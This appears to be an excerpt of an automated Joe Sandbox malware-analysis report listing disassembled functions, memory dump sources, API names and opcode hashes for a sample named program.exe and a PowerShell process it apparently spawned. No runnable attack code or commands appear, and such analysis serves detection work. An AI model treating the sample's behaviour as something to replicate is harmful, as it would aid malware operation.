                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: 00007B6570
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                                                                              • API String ID: 4069847057-118859582
                                                                                                                                                                                                                                              • Opcode ID: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
                                                                                                                                                                                                                                              • Instruction ID: 4d03b99635b448e691b93bce1eef4ff9e0927d5af892c8e8903659d88ac3ea84
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e76ec92c1eceef7b0bbcb8077533a9e54e2e53dd7fd2383ad3f477ea5b2b501f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A351B221B0E68786FB54BB55A8143B952A5AF45B84FAC4032DF4E477FEDE3CE8428300
                                                                                                                                                                                                                                              Function 00007FF6B7525B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: ?
                                                                                                                                                                                                                                              • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                              • Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                              • Instruction ID: f9009eb84b4961b74f439333b38a427d6c0a88f659bf914f75efe23bf268949c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F941E623B1C28256FB659B29954137A67A0EF80BA4F144275EF5D86AF5DF3CD8818B00
                                                                                                                                                                                                                                              Function 00007FF6B7519014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B7519046
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: HeapFree.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A95E
                                                                                                                                                                                                                                                • Part of subcall function 00007FF6B751A948: GetLastError.KERNEL32(?,?,?,00007FF6B7522D22,?,?,?,00007FF6B7522D5F,?,?,00000000,00007FF6B7523225,?,?,?,00007FF6B7523157), ref: 00007FF6B751A968
                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6B750CBA5), ref: 00007FF6B7519064
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: C:\Users\user\Desktop\program.exe
                                                                                                                                                                                                                                              • API String ID: 3580290477-2554842565
                                                                                                                                                                                                                                              • Opcode ID: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                              • Instruction ID: b677119557b6f86b8c06a5fb58fd3cc327bce63cb1526ffe50d729b2e8220c3e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 652ac8178d02f9bf502bb0dac840cc2c27021cfa98e1c84195502d2d1921a3a9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90418937A0CA628AEB159F2998401BD67A4EF44BD1B554039EB4E87FA5DF3CE891C340
                                                                                                                                                                                                                                              Function 00007FF6B751CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                              • String ID: U
                                                                                                                                                                                                                                              • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                              • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction ID: a294a28bbd36a8039f0d9a75b480996b95cbcfc70026829bcab52d0d8dc4ab8f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F41B123A1CA9585DB609F2AE4443AA67A1FB98784F444135EF4DC7BA8EF3DD441CB40
                                                                                                                                                                                                                                              Function 00007FFE0078DBA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_new
                                                                                                                                                                                                                                              • API String ID: 0-402823876
                                                                                                                                                                                                                                              • Opcode ID: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                                              • Instruction ID: 47381be6b5ffc261daca45eb71f081691ee1a824abbfe58454e225ffbdbc78b3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: feb9b1f341a818fe45b99e8c6c162b3a0b89dfbb9c9502528c471bd395979744
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2331C360B0AA8282EB64FB25D8553FD1290FF48744F8C4136DB4D877EEDE2CDA408311
                                                                                                                                                                                                                                              Function 00007FFE007680D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                                              • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                              • Opcode ID: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                              • Instruction ID: dd9afd47a17b20d07f16837a4d6ad0e51b85fcdb3d73576fa96add59b5c094ab
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0b97f4aea56fea0423c07e2c95279f2c9599c66744ee81c656443d2e1a48d07
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7221D572A0968B86DB98DF29D4003B976E4FB89B84F488139DB4E87769DE3CD1418B01
                                                                                                                                                                                                                                              Function 00007FF6B751F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                              • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                              • Instruction ID: 17d1cb73cfb60a2195a6cc62f711a24f1eb5c2635f239ee9431842b37d667d3d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE21B163A0C69181EB209F19D84427D73B1FB88B85F864139DB8D83AE4DF7CE985CB41
                                                                                                                                                                                                                                              Function 00007FF6B750FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction ID: 46f69375e5e0cb36e2d3d13817035f4875b358d53a28a2436d4d03ae55c646c2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D110A33618B8182EB618F19E84025977A5FB88B88F584234DB8D47764DF3DD5528700
                                                                                                                                                                                                                                              Function 00007FF6B752073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2116056322.00007FF6B7501000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B7500000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115877343.00007FF6B7500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116174353.00007FF6B752B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B753E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116227515.00007FF6B7541000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2116412855.00007FF6B7544000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff6b7500000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction ID: faa2155f1e93b51dfa73d5b32b26958f61afaba14c8c3fe0174856b584320da4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1301A223A1C20386F730AF68946127E23A0EF48744F841036D74DC66B5EF3CE5458F24
                                                                                                                                                                                                                                              Function 00007FFE00768B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2119745990.00007FFE00761000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00760000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119715206.00007FFE00760000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE007E5000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE0080D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00818000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119745990.00007FFE00823000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119967268.00007FFE00827000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2119999506.00007FFE00829000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffe00760000_program.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$System$File
                                                                                                                                                                                                                                              • String ID: gfff
                                                                                                                                                                                                                                              • API String ID: 2838179519-1553575800
                                                                                                                                                                                                                                              • Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                              • Instruction ID: 4cb634d17ec5878905c712a010fcb8a5275d36f1ee264cda97eb68c5de2cae24
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8301DBE2B14A8582DF50DB25F8051956794FBCC784B449032E74EC7769EE3CD2058700

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00007FFD9A5B67F5 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1929778258.00007FFD9A5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A5B0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a5b0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 9dfb30400125ef44ff04028fc71009a33377492abdb1f9cc6a67d504134fb5e9
                                                                                                                                                                                                                                              • Instruction ID: a6e8047454790f9b4994e63fad62f989556fad656199f048209a91d83b622de2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9dfb30400125ef44ff04028fc71009a33377492abdb1f9cc6a67d504134fb5e9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CD13862B0EA8A4FEBAA9B6848755B57BE0EF46311B1801FFD05DC74D3DA29E8058341
                                                                                                                                                                                                                                              Function 00007FFD9A4E60C5 Relevance: .3, Instructions: 341COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4e65128a12f90f873f4cf876795f969b3d394cbe664ff3900016c38234bc10ad
                                                                                                                                                                                                                                              • Instruction ID: 4c90f30f9da83645da24eaca1eabc62f50cdb0964d51ab3b05c1ec52a53e1188
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e65128a12f90f873f4cf876795f969b3d394cbe664ff3900016c38234bc10ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C11826690D7C54FD7279B6898351A5BFB0EF13211F1901E7D899CB0E3DA186C18C792
                                                                                                                                                                                                                                              Function 00007FFD9A4E9985 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a57aed8126f8cf33a05efb322494f56c6c81a24f0c9829f0046937bb182f4e50
                                                                                                                                                                                                                                              • Instruction ID: 7c637e6e1df4d27f4ad752d209213ee8a71cae1b19999283f49bb330e5b06b8a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a57aed8126f8cf33a05efb322494f56c6c81a24f0c9829f0046937bb182f4e50
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D541F931A0CB484FDB1C9B5CAC466F8BBE0EB55321F00426FD04983692CB757856CBC6
                                                                                                                                                                                                                                              Function 00007FFD9A4E9870 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 43d2cba59af63916f1be12e9f8fcb582879daf4c1f8be19a8a0646bd263e53eb
                                                                                                                                                                                                                                              • Instruction ID: 9d21498a7ec69f5e5f5564df279bdb9f6a4adc7545e6db9434f9770d5f27332c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43d2cba59af63916f1be12e9f8fcb582879daf4c1f8be19a8a0646bd263e53eb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2741E871A1CB884FDB1C9F5C9C466A97BE0FBA9310F04426FE44DD3292CA60AD15CBC2
                                                                                                                                                                                                                                              Function 00007FFD9A4EA59C Relevance: .1, Instructions: 132COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1928918265.00007FFD9A4E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4E0000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a4e0000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 8f07e691b6fa67504a740d682680ccc6db9136972f696bf8e46dd43586186ceb
                                                                                                                                                                                                                                              • Instruction ID: c21fc7b9796f2a01b731766dcc99bb3da0c74dfd77bd311d696aca5c9cfae674
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f07e691b6fa67504a740d682680ccc6db9136972f696bf8e46dd43586186ceb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64412A7190C7884FDB19DBAC98467E97FE0EB56331F04816FD04DC3152D6756416CB91
                                                                                                                                                                                                                                              Function 00007FFD9A3CE540 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.1927622420.00007FFD9A3CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3CD000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_7ffd9a3cd000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 7c4e97459396328d1dd943123e1f03ca1e5a8da574ae82d3dd03b970f8f135e1
                                                                                                                                                                                                                                              • Instruction ID: 42ada090a615312917e6c53743a79e1ed2b4d9d72cff3ddaaf4a44f4f49c8729
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c4e97459396328d1dd943123e1f03ca1e5a8da574ae82d3dd03b970f8f135e1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6A41253140DBC44FE76AAB689C519523FF0EF42324F1601DFD488CB0A3D625E805C792
                                                                                                                                                                                                                                              Function 00007FFD9A4EA668 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
